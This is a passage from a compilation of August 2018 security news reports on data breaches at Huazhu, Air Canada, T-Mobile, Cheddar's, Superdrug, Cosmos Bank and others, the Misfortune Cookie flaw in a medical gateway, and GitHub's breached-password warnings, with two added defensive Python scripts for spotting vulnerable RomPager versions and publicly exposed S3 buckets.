According to Brazilian newspaper ‘O Globo,’ the Public Ministry of the Federal District and Territories (MPDFT) has launched an investigation on the data breach fearing that data from 2 million customers of C&A were leaked online.

The company confirmed that it detected the incident last week and immediately started its incident response procedures; it also reported the intrusion to the authorities.

C&A highlighted that it doesn’t use personal data for any unauthorized purposes.

“we reiterate our commitment to ethics and respect to the laws and that we work to offer the best possible experience to our customers, and that includes the online environment.” added C&A.


China Probes Suspected Customer Data Leak at Accor Partner
30.8.18 securityweek Incindent

Shanghai police said they were investigating a suspected data leak at NASDAQ-listed Chinese hotelier Huazhu Group, the local partner of France-based AccorHotels.

Huazhu, one of China’s biggest hoteliers, released a statement on Tuesday saying it had alerted police to reports that the company's internal data was being sold online, asking them to investigate.

Chinese media reports said the data included guest membership information, personal IDs, check-in records, guest names, mobile numbers, and emails.

Police in Shanghai said in a statement that they were looking into the case.

Huazhu's website said it operates more than 3,000 hotels in more than 370 cities in China, including the AccorHotels brands Ibis and Mercure.

Shanghai-based Huazhu formed a long-term alliance with Accor in 2014 to help the French hotel group develop the Chinese market.

Huazhu said the release of the data had caused a "vicious impact", without giving specifics, and that it was conducting an internal investigation.

The sale of personal information is common in China, which last year implemented a controversial cybersecurity law that requires services to store user data in China and receive approval from users before sharing their details.

Chinese e-commerce giant Alibaba came under fire earlier this year over its handling of user data in an episode that underscores growing concerns for privacy in the hyper-digitised country.

Alibaba's online-payments affiliate Ant Financial was forced to apologise after users said they felt misled into allowing its Alipay service to share data on their spending habits with Ant's credit-scoring arm and other third-party services.


4-year old Misfortune Cookie vulnerability threatens Capsule Technologies medical gateway device
30.8.18 securityaffairs Incindent

The Misfortune Cookie flaw is threatening medical equipment that connects bedside devices to the hospital’s network infrastructure.
In December 2014, researchers at Check Point Software Technologies discovered the Misfortune Cookie vulnerability, a flaw affecting millions of devices running an embedded web server called RomPager. The vulnerability could be exploited by an attacker to run a man-in-the-middle attack on traffic going to and from home routers from every manufacturer.

An attacker that is able to compromise a vulnerable device like a home router could use it as an entry point in a target network and hack other devices.

Four years later, the Misfortune Cookie vulnerability is still threatening devices worldwide, in particular, medical equipment that connects bedside devices to the hospital’s network infrastructure.

Researchers from security firm CyberMDX discovered that flawed versions of RomPager (4.01 through 4.34) run on different variants of the Capsule Datacaptor Terminal Server (DTS) included in its medical device information system.

The gateway device connects bedside equipment (anesthesia and infusion pumps, respirators and IoT products) to the network.

“CyberMDX discovered a previously undocumented vulnerability in the device, noting that Qualcomm Life’s Capsule Datacaptor Terminal Server (a medical device gateway) is exposed to the “misfortune cookie” CVE-2014-9222. This opens the possibility for remote arbitrary memory write, which can lead to unauthorized login and code execution.” reads the security advisory published by the company.

Experts warn that modifying the configuration of the Capsule Datacaptor Terminal Server directly influences the connectivity of the medical device. The attacker can exploit the flaw to steal the patient’s sensitive information.

“Altering the availability and/or configuration of the Capsule Datacaptor Terminal Server directly influences the connectivity of the medical device and allows spoofing communication to and/or from the medical device. In other words — when patient’s sensitive information is sent from a medical device it can be leaked and spoofed by an attacker in this situation.” continues the report.

The bad news is that exploit code for this flaw is publicly available online.


The US ICS-CERT issued an alert for the vulnerability; the flaw, tracked as CVE-2014-9222, received a severity score of 9.8 out of 10.

“This vulnerability allows an attacker to send a specially crafted HTTP cookie to the web management portal to write arbitrary data to the device memory, which may allow remote code execution,” states the ICS-CERT.

Qualcomm Life Capsule Technologies has released a security patch to address the vulnerability, but it only applies to the Single Board variant of the DTS (from 2009); it cannot be applied to the Dual Board, the Capsule Digi Connect ES, or the Capsule Digi Connect ES converted to DTS.

Administrators of the products that cannot be updated should disable the embedded web server as a mitigation; the web server is in fact only used for configuration during the initial deployment and is not necessary for remote support of the device.

NCCIC recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. Below are the recommendations included in the ICS-CERT alert:

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
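As an added example (not code from CyberMDX, Capsule or ICS-CERT), the following Python triages an inventory of device HTTP response heads by the RomPager version advertised in the Server header, using the 4.01 through 4.34 range the article reports, and maps each verdict to the mitigation above; the host names and response heads are constructed.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Affected range as reported in the article for the Capsule DTS
# (Misfortune Cookie, CVE-2014-9222): RomPager 4.01 through 4.34.
VULNERABLE_MIN: Tuple[int, int] = (4, 1)
VULNERABLE_MAX: Tuple[int, int] = (4, 34)

# Product token as it typically appears in a Server header,
# e.g. "RomPager/4.07 UPnP/1.0" or "Allegro-Software-RomPager/4.34".
_ROMPAGER_RE = re.compile(r"RomPager/(\d+)\.(\d+)", re.IGNORECASE)


class BannerVerdict(NamedTuple):
    host: str
    rompager: bool                      # embedded RomPager web server advertised
    version: Optional[Tuple[int, int]]  # (major, minor), None if not parsable
    vulnerable: Optional[bool]          # None when RomPager is seen without a version
    advice: str


def server_header(raw_response_head: str) -> Optional[str]:
    """Return the Server: header value from a raw, CRLF-separated HTTP response head."""
    for line in raw_response_head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None


def assess_banner(host: str, raw_response_head: str) -> BannerVerdict:
    """Classify one device by the embedded web server it advertises."""
    banner = server_header(raw_response_head) or ""
    if "rompager" not in banner.lower():
        # A missing or different banner is not proof of safety: banners can be
        # absent or altered, so confirm the device model by other means.
        return BannerVerdict(host, False, None, None,
                             "No RomPager banner; verify the model from the asset inventory.")
    match = _ROMPAGER_RE.search(banner)
    if not match:
        return BannerVerdict(host, True, None, None,
                             "RomPager advertised without a version; treat as unpatched "
                             "until the firmware level is confirmed with the vendor.")
    version = (int(match.group(1)), int(match.group(2)))
    vulnerable = VULNERABLE_MIN <= version <= VULNERABLE_MAX
    if vulnerable:
        advice = ("Apply the vendor patch where the variant supports it (Single Board DTS); "
                  "otherwise disable the embedded web server, which is only needed during "
                  "initial configuration, and keep the device off Internet-reachable networks.")
    else:
        advice = "Version outside the reported affected range; keep it segmented per ICS-CERT guidance."
    return BannerVerdict(host, True, version, vulnerable, advice)


def triage(hosts_and_heads: List[Tuple[str, str]]) -> List[BannerVerdict]:
    """Assess every device and order the results most urgent first."""
    verdicts = [assess_banner(h, head) for h, head in hosts_and_heads]
    # confirmed vulnerable, then RomPager of unknown version, then everything else
    return sorted(verdicts, key=lambda v: (v.vulnerable is not True,
                                           not v.rompager,
                                           v.version is not None))


# Constructed sample inventory, as an internal scanner might record it.
SAMPLE_INVENTORY = [
    ("dts-ward3.example.internal",
     "HTTP/1.1 200 OK\r\nServer: RomPager/4.07 UPnP/1.0\r\nContent-Type: text/html\r\n\r\n"),
    ("dts-ward5.example.internal",
     "HTTP/1.0 401 Unauthorized\r\nServer: Allegro-Software-RomPager/4.34\r\n\r\n"),
    ("dts-icu1.example.internal",
     "HTTP/1.1 200 OK\r\nServer: RomPager\r\n\r\n"),
    ("mgmt-switch.example.internal",
     "HTTP/1.1 200 OK\r\nServer: lighttpd/1.4.35\r\n\r\n"),
]

if __name__ == "__main__":
    for v in triage(SAMPLE_INVENTORY):
        print(f"{v.host}: rompager={v.rompager} version={v.version} vulnerable={v.vulnerable}")
        print(f"  -> {v.advice}")
```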


Data of 130 Million hotel chain guests offered for 8 BTC on Dark Web
30.8.18 securityaffairs Incindent

A hacker is offering for sale the personal details of over 130 million hotel chain guests on a Chinese Dark Web forum.
The news was reported by BleepingComputer: a hacker is selling the personal details of over 130 million hotel guests for 8 Bitcoin on a Chinese Dark Web forum.

“The breach was reported today by Chinese media after several cyber-security firms spotted the forum ad [1, 2, 3, 4].” states Bleeping Computer.

The price for the huge trove of data is 8 Bitcoin (roughly $49,000), it includes official website registration information (ID card number, mobile phone number, email address, login password); check-in registration information (customer name, ID card number, home address, birthday), and booking information (name, card number, mobile phone number, check-in time, departure time, hotel ID number, room number).

The offer was noticed by several cyber-security firms; the hacker claims to have obtained the data from Huazhu Hotels Group Ltd, one of the biggest Chinese hotel chains, which operates 13 hotel brands across 5,162 hotels in 1,119 Chinese cities.

The stolen data appears to be related to guests who stayed at any of Huazhu’s hotel brands (Hanting Hotel, Grand Mercure, Joye, Manxin, Novotel, Mercure, CitiGo, Orange, All Season, Starway, Ibis, Elan, Haiyou).

The ad published by the seller states the stolen data is included in an archive of 141.5 GB that contains 240 million records, with information on roughly 130 million hotel guests that stayed at one of Huazhu hotels.


On August 28th, the China Lodging Group issued a statement on the Weibo platform announcing that the group has launched an internal investigation, the Chinese hotel chain also reported the incident to the authorities.

According to the Chinese cyber-security firm Zibao, the data is authentic and the incident likely occurred in early August.

Zibao experts believe the data comes from a new leak rather than being collected from previous data breaches; it appears to be linked to a mistake by a Huazhu programmer who uploaded it to GitHub.

“Zibao Technology believes that this batch of data is suspected to be leaked by a Chinese-speaking company programmer who uploaded to GitHub 20 days ago using a database connection.” reads bjnews.com.cn.


Air Canada data breach – 20,000 users of its mobile app affected
30.8.18 securityaffairs Incindent

Air Canada data breach – The incident was confirmed by the company and may have affected 20,000 customers (1%) of its 1.7 million mobile app users.
The data breach of the day is the one suffered by Air Canada that may have affected 20,000 customers (1%) of its 1.7 million mobile app users.

The news was confirmed by Air Canada, which revealed that it had detected unusual login behaviour on Air Canada’s mobile App between Aug. 22-24, 2018; it added that financial data was protected but invited customers to remain vigilant for fraudulent credit card transactions.

“We detected unusual login behaviour with Air Canada’s mobile App between Aug. 22-24, 2018. We immediately took action to block these attempts and implemented additional protocols to protect against further unauthorized attempts. As an additional security precaution, we have locked all Air Canada mobile App accounts to protect our customers’ data.” reads the data breach notification.

“Your credit card information is protected. Credit cards that are saved to your profile are encrypted and stored in compliance with security standards set by the payment card industry or PCI standards. As a best practice, customers should always monitor their transactions and credit rating carefully and contact their financial services provider immediately if they become aware of any unusual or unauthorized activities.”

The company has asked Mobile+ app users to reset their accounts as a security precaution. Air Canada contacted potentially affected customers by email to notify them of the data breach.

Air Canada immediately took action to lock out unauthorized attempts and implemented additional security measures to protect its mobile users.

The most disconcerting aspect of the Air Canada data breach is that attackers may have accessed additional data including the customer’s passport number, passport expiration date, passport country of issuance and country of residence, Aeroplan number, known traveler number, NEXUS number, gender, date of birth, and nationality.

All of this data could have been saved in the profile section of the Air Canada mobile app.

At the time, the root cause of the Air Canada data breach is still unclear; the company urges users to reset their passwords.

All 1.7 million accounts have been temporarily locked until the customers change their passwords.


Personal details of 37,000 Eir customers exposed after the theft of a laptop
26.8.18 securityaffairs Incindent

Personal details of 37,000 Eir customers exposed after the theft of a laptop, including names, email addresses, phone numbers and account numbers.
Eir, the fixed, mobile and broadband telecommunications company of Ireland, has suffered a data breach this week.

Personal details of 37,000 Eir customers have been exposed according to the telecommunications company.

The root cause of the data leak is the theft offsite of an unencrypted laptop containing the customers’ data. Exposed records include names, email addresses, phone numbers and Eir account numbers.

“eir has reported a data breach of personal details for up to 37,000 customers to the Data Protection Commissioner. The data consists of names, email addresses, phone numbers and eir account numbers.” states the data breach notification published by the company on its official website.

“This is a result of the theft of one laptop, which was stolen off premises. No other personal or financial data relating to customers was stored on the laptop in question.”

According to the company, no financial data was exposed.


The telco reported the incident to the Data Protection Commissioner and to the gardaí; the good news for customers is that the stolen information has not been used by a third party in a targeted attack.

“Eir treats privacy and protection of all data extremely seriously and our policy is that all company laptops should be encrypted as well as a password protected,” it said.

“In this case the laptop had been decrypted by a faulty security update the previous working day, which had affected a subset of our laptops and was subsequently resolved.”

Eir is notifying the affected customers of the incident.


The restaurant chain Cheddar’s Scratch Kitchen has suffered a payment card breach
25.8.18 securityaffairs Incindent

The restaurant chain Cheddar’s Scratch Kitchen suffered a payment card breach; hackers were inside the company network between Nov. 3, 2017 and Jan. 2, 2018.
Once again we are here to discuss a data breach suffered by a restaurant chain; this time the victim is Cheddar’s Scratch Kitchen.

The news has been confirmed by the company that was informed of the data breach this month.

Attackers breached the company network between Nov. 3, 2017 and Jan. 2, 2018 and stole customer payment card data.

“Cheddar’s Scratch Kitchen restaurants have been the victims of cyberattacks, which may have resulted in unauthorized access to or acquisition of your payment card information.” reads the data breach notification.

“On August 16, 2018, Cheddar’s Scratch Kitchen (a concept acquired by Darden Restaurants in 2017) learned that between November 3, 2017 and January 2, 2018, an unauthorized person or persons gained access to the Cheddar’s Scratch Kitchen network and were able to access and potentially obtain payment card information used to make purchases in certain Cheddar’s Scratch Kitchen restaurants.”

Restaurants affected by the security breach are in Alabama, Arizona, Arkansas, Delaware, Florida, Illinois, Indiana, Iowa, Kansas, Louisiana, Maryland, Michigan, Missouri, Nebraska, New Mexico, North Carolina, Ohio, Oklahoma, Pennsylvania, South Carolina, Texas, Virginia, and Wisconsin.


Cheddar’s Scratch Kitchen hired a third-party cybersecurity firm to investigate the security breach, and the investigation is still ongoing. It seems that the hackers compromised a network that was permanently disabled and replaced by April 10, 2018; current systems and networks were not impacted by this incident.

“The unauthorized access appears to have occurred on a network that was permanently disabled and replaced by April 10, 2018.” continues the notification.

“It’s important to note that there are no indications of unauthorized access to the current Cheddar’s Scratch Kitchen network and systems.”

The company is recommending that customers enrol in the identity protection services it is providing. Customers must remain vigilant and take steps to protect themselves from identity theft by reviewing their account statements and by periodically checking their credit report from one or more of the national credit reporting agencies.

The company is offering a free annual credit report from each of the nationwide credit reporting companies—Equifax, Experian, and TransUnion.


Half a Million Cards Exposed in Cheddar's Scratch Kitchen Breach
24.8.18 securityweek Incindent

Over half a million payment card numbers were exposed after cybercriminals compromised the point-of-sale system of certain Cheddar's Scratch Kitchen restaurants, Darden Restaurants announced.

Previously known as Cheddar's Casual Café and based in Irving, Texas, Cheddar's Scratch Kitchen was founded in 1979 and had more than 163 locations in 23 states as of 2016. Darden acquired the concept in 2017.

In a notice published this week, Darden revealed that it learned of the data breach on August 16, 2018, from federal authorities. The compromised system, the company says, was a legacy point-of-sale system used in certain restaurant locations.

The incident might have impacted the payment card information of guests who visited the affected Cheddar's restaurants between Nov. 3, 2017 and Jan. 2, 18. A total of 567,000 payment card numbers are believed to have been compromised.

The data breach impacted Cheddar's restaurants located in Alabama, Arizona, Arkansas, Delaware, Florida, Illinois, Indiana, Iowa, Kansas, Louisiana, Maryland, Michigan, Missouri, Nebraska, New Mexico, North Carolina, Ohio, Oklahoma, Pennsylvania, South Carolina, Texas, Virginia and Wisconsin.

The company says that it has engaged a third-party forensic cybersecurity firm to investigate the incident and that its current systems and networks were not impacted. The legacy system that was compromised “was permanently disabled and replaced by April 10, 2018, as part of our integration process,” the company says.

Cheddar's isn’t the only restaurant chain to have suffered a payment card breach this year. Malware at Chili’s restaurants collected customer card information in March and April, Brinker, which operates over 1,600 Chili’s and Maggiano’s restaurants, revealed in May.

In March, RMH Franchise Holdings revealed that over 160 Applebee’s restaurants were impacted by point-of-sale (PoS) malware that could collect names, credit or debit card numbers, expiration dates, and card verification codes.


T-Mobile data breach exposed personal information of up to 2 million customers
24.8.18 securityaffairs Incindent

T-Mobile today announced that it has suffered a security breach that may have exposed the personal information of up to 2 million T-Mobile customers.

According to the telco giant, the incident affected its US servers on August 20; the leaked information includes customers’ name, billing zip code, phone number, email address, account number, and account type (prepaid or postpaid).

T-Mobile notified the affected customers of the security breach via SMS message, a letter in the mail, or a phone call.

“Our cyber-security team discovered and shut down an unauthorized access to certain information, including yours, and we promptly reported it to authorities. None of your financial data (including credit card information) or social security numbers were involved, and no passwords were compromised” reads the announcement published on the company’s website.

“However, you should know that some of your personal information may have been exposed, which may have included one or more of the following: name, billing zip code, phone number, email address, account number and account type (prepaid or postpaid).”

The company ruled out that the security breach exposed financial data such as credit card numbers.

In a blog post, T-Mobile explained how its staff detected and locked out the intruders on Monday, August 20.

At the time T-Mobile did not share details of the hack and did not provide information on the extent of the incident.

A spokesperson for T-Mobile told Motherboard that the incident affected less than 3 percent of its 77 million customers.

The spokesperson added that the attack was carried out by hackers of “an international group.”

The attackers managed to access T-Mobile servers through an API. The good news is that the API was not designed to provide access to financial data or other sensitive information.

“We found it quickly and shut it down very fast,” added the spokesperson.

T-Mobile reported the incident to law enforcement.

“We take the security of your information very seriously and have a number of safeguards in place to protect your personal information from unauthorized access,” T-Mobile said. “We truly regret that this incident occurred and are so sorry for any inconvenience this has caused you.”

The company is urging customers to contact its customer service through 611 for any information regarding the security breach.


Crooks claim to have stolen 20k customer records from Superdrug cosmetics retailer
21.8.18 securityaffairs Incindent

Hackers claim to have stolen the personal details of almost 20,000 Superdrug customers who shopped online at the cosmetics retailer.
The British retailer Superdrug is the latest victim of a security breach: hackers claim to have stolen the personal details of almost 20,000 people who shopped online at the cosmetics retailer.

Hackers accessed customers’ names, addresses and in some cases dates of birth, phone number and points balances.

The company has confirmed the incident; the good news is that the hackers did not access payment card details.

Superdrug notified customers of the incident via email, warning of the “possible disclosure of your personal data, but not including your payment card information.”

The hackers contacted the company on Monday evening, informing it that they had obtained details on approximately 20,000 customers; as proof of the hack they shared details of 386 of the compromised accounts.

“The hacker shared a number of details with us to try and ‘prove’ he had customer information – we were then able to verify they were Superdrug customers from their email and log-in.” reported the DailyMail citing a spokeswoman for the company.

The hackers likely attempted to blackmail the company, threatening to publicly disclose the hack.

The crooks alleged they had “obtained information on approximately 20,000 customers but we have only seen 386,” the spokeswoman said.

Superdrug (@superdrug) tweeted on Aug 21, 2018: “To customers who have received an email from us today, this email is genuine. We recommend you follow the steps we outlined.”
“On the evening of the 20th of August, we were contacted by hackers who claimed they had obtained a number of our customers’ online shopping information,” the note from boss Peter Macnab stated.

“There is no evidence that Superdrug’s systems have been compromised. We believe the hacker obtained customers’ email addresses and passwords from other websites and then used those credentials to access accounts on our website.”


Superdrug tried to downplay the incident, maintaining that the hackers obtained the credentials from third-party data breaches. The crooks exploited the fact that people reuse their passwords across various web services.

In any case, Superdrug customers should reset the password they use to access Superdrug.com.

Superdrug reported the issue to the authorities and Action Fraud and it “will be offering them all the information they need for their investigation.”

“We have contacted the Police and Action Fraud (the UK’s national fraud and cyber crime arm) and will be offering them all the information they need for their investigation as we continue to take the responsibility of safeguarding our customers’ data incredibly seriously.” reads the note sent via email to the customers.


Cosmos Bank – Hackers stole Rs 94 crore ($13.5 million) in just in 2 days
17.8.18 securityaffairs Incindent

Cosmos Bank, one of the largest Indian cooperative banks, confirmed it was the victim of a cyberheist: over the weekend, hackers stole over 940 million rupees ($13.5 million) in three days.
Hackers stole over 940 million rupees ($13.5 million) in three days from the Indian cooperative Cosmos Bank. The bank publicly disclosed the attacks at a press conference on Tuesday; according to the financial institution, the hackers stole the funds in three attacks using malware.

“Hackers managed to siphon off over Rs 94 crore through a malware attack on the server of Pune-based Cosmos Bank and cloning thousands of the bank’s debit cards over a period of two days, a top official said.” reports the economictimes.indiatimes.com.

According to Cosmos Bank chairman Milind Kale, the attack was launched from Canada, but the country was likely only used as a relay for the attack.

The first two security breaches occurred on August 11 when hackers withdrew 805 million rupees ($11.4 million) through 14,849 ATM transactions across 28 countries.

“The fraudulent transactions were carried out on August 11 and August 13 and the malware attack by the hackers originated in Canada, Cosmos Bank chairman Milind Kale told reporters here today.”

“In two days, hackers withdrew a total Rs 78 crore from various ATMs in 28 countries, including Canada, Hong Kong and a few ATMs in India, and another Rs 2.5 crore were taken out within India,” he said.

“On August 13, hackers again transferred Rs 13.92 crore in a Hong Kong-based bank by using fraudulent transactions.”

In the first wave of attacks, crooks stole 780 million rupees ($11 million) through 12,000 ATM withdrawals via the VISA card system. Most of the fraudulent transactions were made overseas.

The second wave of attacks was launched two hours later; cybercriminals withdrew an additional 25 million rupees ($400,000) via 2,849 ATM transactions through the Rupay debit card system at ATM locations across India.

The good news is that the Cosmos Bank detected the fraudulent transactions and halted them, but its staff was not able to lock out the attackers.

On Monday, August 13, the hackers launched a third wave of attacks targeting the SWIFT system. Crooks made three fraudulent transactions to a bank account in Hong Kong for a total of Rs 13.92 crore ($1.8 million).

The good news is that money wasn’t stolen from customer accounts; the bank reported the incident to the authorities and is currently investigating the attacks with the support of a forensic agency.

“On Saturday afternoon, the bank came to know about malware attack on its debit card payment system and it was observed that unusual repeated transactions were taking place through Visa and Rupay cards used at various ATMs for nearly two hours,” Kale added.

Crooks used a “parallel” or proxy switch system while cloning the cards; all the fraudulent payment approvals were passed through this proxy mechanism.

Kale confirmed, however, that the core banking system was not affected by the malware attack.


Unsecured AWS S3 Bucket exposed sensitive data on 31,000 GoDaddy servers

12.8.18 securityaffairs Incindent

UpGuard discovered an unsecured GoDaddy Amazon S3 bucket containing sensitive information related to more than 31,000 GoDaddy systems.
Experts at cybersecurity firm UpGuard have reported that another big company was the victim of a data leak: the domain name registrar and web hosting company GoDaddy.

UpGuard risk analyst Chris Vickery discovered an unsecured GoDaddy Amazon S3 bucket containing sensitive information related to more than 31,000 GoDaddy systems.

“The UpGuard Cyber Risk Team has discovered and secured a data exposure of documents appearing to describe GoDaddy infrastructure running in the Amazon AWS cloud, preventing any future exploitation of this information.” reads the post published by UpGuard.

“The documents were left exposed in a publicly accessible Amazon S3 bucket which, according to a statement from Amazon, ‘was created by an AWS salesperson.’”

The expert discovered the unsecured AWS bucket named abbottgodaddy on June 19th, 2018. It contained several versions of a spreadsheet, the latest one named “GDDY_cloud_master_data_1205 (AWS r10).xlsx”.

The document was a 17MB Microsoft Excel file with multiple sheets and tens of thousands of rows.

Each sheet contained data related to the large-scale infrastructure running in the Amazon cloud, such as “high-level configuration information” of company systems and pricing facilities for operating them.

“The exposed configuration information included fields for hostname, operating system, “workload” (what the system was used for), AWS region, memory and CPU specs, and more.” continues the post.

“Essentially, this data mapped a very large scale AWS cloud infrastructure deployment, with 41 different columns on individual systems, as well as summarized and modeled data on totals, averages, and other calculated fields. Also included were what appear to be GoDaddy’s discounts from Amazon AWS, usually restricted information for both parties, who must negotiate for rates– as do GoDaddy’s competitors.”


The experts pointed out that the availability of the configuration information for the GoDaddy infrastructure could allow attackers to select targets based on their role, probable data, size, and region.

Competitors, vendors, cloud providers, and others, could also use business data exposed in the unsecured Amazon S3 bucket as a competitive advantage for cloud hosting strategy and pricing.

“From operations as large as GoDaddy and Amazon, to small and medium organizations, anyone who uses cloud technology is subject to the risk of unintentional exposure, if the operational awareness and processes aren’t there to catch and fix misconfigurations when they occur,” concludes UpGuard.

This year many other companies have exposed sensitive data in the same way, including Accenture, FedEx, and Walmart. Even though Amazon S3 buckets are configured by default with a secure configuration, many AWS customers turn off security settings for expedience. This particular data leak was caused by an AWS employee.

“The bucket in question was created by an AWS salesperson to store prospective AWS pricing scenarios while working with a customer,” an Amazon spokesperson said. “No GoDaddy customer information was in the bucket that was exposed. While Amazon S3 is secure by default, and bucket access is locked down to just the account owner and root administrator under default configurations, the salesperson did not follow AWS best practices with this particular bucket.”
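As an added example (not UpGuard's, GoDaddy's or AWS's code), the script below evaluates the class of misconfiguration described above from a bucket's ACL, bucket policy and Public Access Block settings, and shows the corrected settings beside the exposed ones. The input shapes follow the S3 API's GetBucketAcl, GetBucketPolicy and GetPublicAccessBlock responses; the sample buckets, owner id and bucket names are constructed for the example.

```python
"""Assess whether an S3 bucket is exposed, from its ACL, bucket policy and
Public Access Block settings. Added example; not UpGuard's or AWS's code.

Assumptions: the input dicts mirror the JSON shapes the S3 API returns for
GetBucketAcl, GetBucketPolicy and GetPublicAccessBlock; the sample buckets
below are constructed for this example and describe no real bucket.
"""
import json
from typing import Optional

# The two ACL grantee groups that make a bucket readable beyond its owner.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers (anyone)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers (any AWS account)",
}
PAB_FLAGS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")


def acl_public_grants(acl: dict) -> list:
    """Findings for every ACL grant made to a public group."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            findings.append(f"ACL grants {grant.get('Permission')} to {PUBLIC_GROUPS[grantee['URI']]}")
    return findings


def _principal_is_public(principal) -> bool:
    """True for Principal "*" or {"AWS": "*"} (also when "*" sits in a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def policy_public_statements(policy_json: Optional[str]) -> list:
    """Findings for Allow statements whose principal is everyone."""
    if not policy_json:
        return []
    statements = json.loads(policy_json).get("Statement", [])
    if isinstance(statements, dict):  # a single statement may appear without a list
        statements = [statements]
    findings = []
    for i, st in enumerate(statements):
        if st.get("Effect") != "Allow" or not _principal_is_public(st.get("Principal")):
            continue
        actions = st.get("Action", [])
        actions = ", ".join(actions) if isinstance(actions, list) else str(actions)
        scope = " (narrowed by a Condition; review it)" if st.get("Condition") else ""
        findings.append(f"policy statement {st.get('Sid', i)} allows {actions} to everyone{scope}")
    return findings


def pab_gaps(pab: Optional[dict]) -> list:
    """Findings for Public Access Block flags that are missing or false."""
    if pab is None:
        return ["no Public Access Block configuration on the bucket"]
    return [f"PublicAccessBlock.{flag} is not enabled" for flag in PAB_FLAGS if not pab.get(flag)]


def assess_bucket(name: str, acl: dict, policy_json: Optional[str], pab: Optional[dict]) -> dict:
    """Combine the three checks into one verdict.

    IgnorePublicAcls neutralises public ACL grants and RestrictPublicBuckets
    neutralises public policy grants, so with both on the bucket is not
    effectively public even if the grants are still present (they stay in
    the findings because they should be removed anyway).
    """
    acl_findings = acl_public_grants(acl)
    policy_findings = policy_public_statements(policy_json)
    pab_findings = pab_gaps(pab)
    flags = pab or {}
    effective_public = (bool(acl_findings) and not flags.get("IgnorePublicAcls")) or (
        bool(policy_findings) and not flags.get("RestrictPublicBuckets"))
    return {"bucket": name, "public": effective_public,
            "findings": acl_findings + policy_findings + pab_findings}


# Constructed sample: a bucket left world-readable through its ACL and a
# public-read policy, with no Public Access Block at all.
EXPOSED_ACL = {
    "Owner": {"ID": "example-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "example-owner-id"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}
EXPOSED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
    "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}]})

# Constructed sample: the corrected bucket - owner-only ACL, no policy,
# all four Public Access Block flags enabled.
LOCKED_ACL = {"Owner": {"ID": "example-owner-id"}, "Grants": [EXPOSED_ACL["Grants"][0]]}
LOCKED_PAB = {flag: True for flag in PAB_FLAGS}

if __name__ == "__main__":
    for args in (("example-exposed", EXPOSED_ACL, EXPOSED_POLICY, None),
                 ("example-locked", LOCKED_ACL, None, LOCKED_PAB)):
        print(json.dumps(assess_bucket(*args), indent=2))
```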


GitHub started warning users when adopting compromised credentials
9.8.18 securityaffairs Incindent

In order to improve the security of its users, the popular software code hosting service GitHub is now alerting account holders whenever it detects that a password has been exposed by data breaches on other services.
Last week GitHub introduced a new feature to protect its users: it alerts them whenever it detects that a password has been compromised in a third-party data breach.

GitHub has teamed up with the HaveIBeenPwned.com service, managed by the cybersecurity expert Troy Hunt, to implement a feature that allows users to check whether their credentials have been involved in known data breaches.

“Common password advice is to use a long and unique password for each website you have an account with. It’s challenging to remember a strong and unique password for each website without either using a password manager or using a trivially discovered theme. As a result, password reuse is extremely prevalent. Regardless of the strength of a password, a single breach can nullify its security when used elsewhere.” reads the advisory published by GitHub.

“While Troy hosts a service that people and services can use to check for compromised passwords, he also generously made the approximately 517 million record dataset available for download. Using this data, GitHub created an internal version of this service so that we can validate whether a user’s password has been found in any publicly available sets of breach data.”

GitHub has developed a service that leverages the 517 million record dataset provided by Hunt to “validate whether a user’s password has been found in any publicly available sets of breach data.”


The feature will alert users that are using compromised credentials and ask them to change them during login, registration, or during a password change.

GitHub stores its users’ passwords hashed with the bcrypt algorithm.

“Don’t worry, your password is protected by the password hashing function bcrypt in our database. We only verify whether your password has been compromised when you provide it to us,” continues GitHub.

GitHub encourages the use of two-factor authentication (2FA); users who have enabled it will receive periodic warnings to review their 2FA setup and recovery options.

“If you have two-factor authentication enabled, GitHub will now periodically remind you to review your 2FA setup and recovery options. We highly recommend using a 2FA authenticator application that supports cloud backups in the event your phone is lost, stolen, or falls in the ocean.” continues the advisory.

In June, Microsoft announced the acquisition of GitHub for $7.5 billion in Microsoft stock, and the hosting service is improving its security by introducing new measures, including enforcing SSL/TLS.


GitHub to Warn Users on Compromised Passwords
6.8.18 securityweek  Incindent

In a move to protect its users, software repository site GitHub is now alerting account holders whenever it detects that a password has been compromised in breaches on other services.

Security experts have long pushed for the use of long, unique passwords, to ensure stronger security of all online accounts. However, even unique passwords can pose a great risk when compromised, especially if attackers can link them to specific accounts.

The new feature is the result of a partnership with Troy Hunt, the security researcher behind the popular HaveIBeenPwned.com project. The service allows users to check whether their accounts and passwords have appeared in any data breaches.

An internal tool GitHub has created is now taking advantage of a 517 million record dataset that Hunt made available for download through his service to “validate whether a user’s password has been found in any publicly available sets of breach data.”

The open-source software repository platform enabled the feature last week. The functionality, it says, is meant to alert all people who are using compromised passwords and prompt them to select a different one during login, registration, or when updating their password.

“Don’t worry, your password is protected by the password hashing function bcrypt in our database. We only verify whether your password has been compromised when you provide it to us,” GitHub explains.
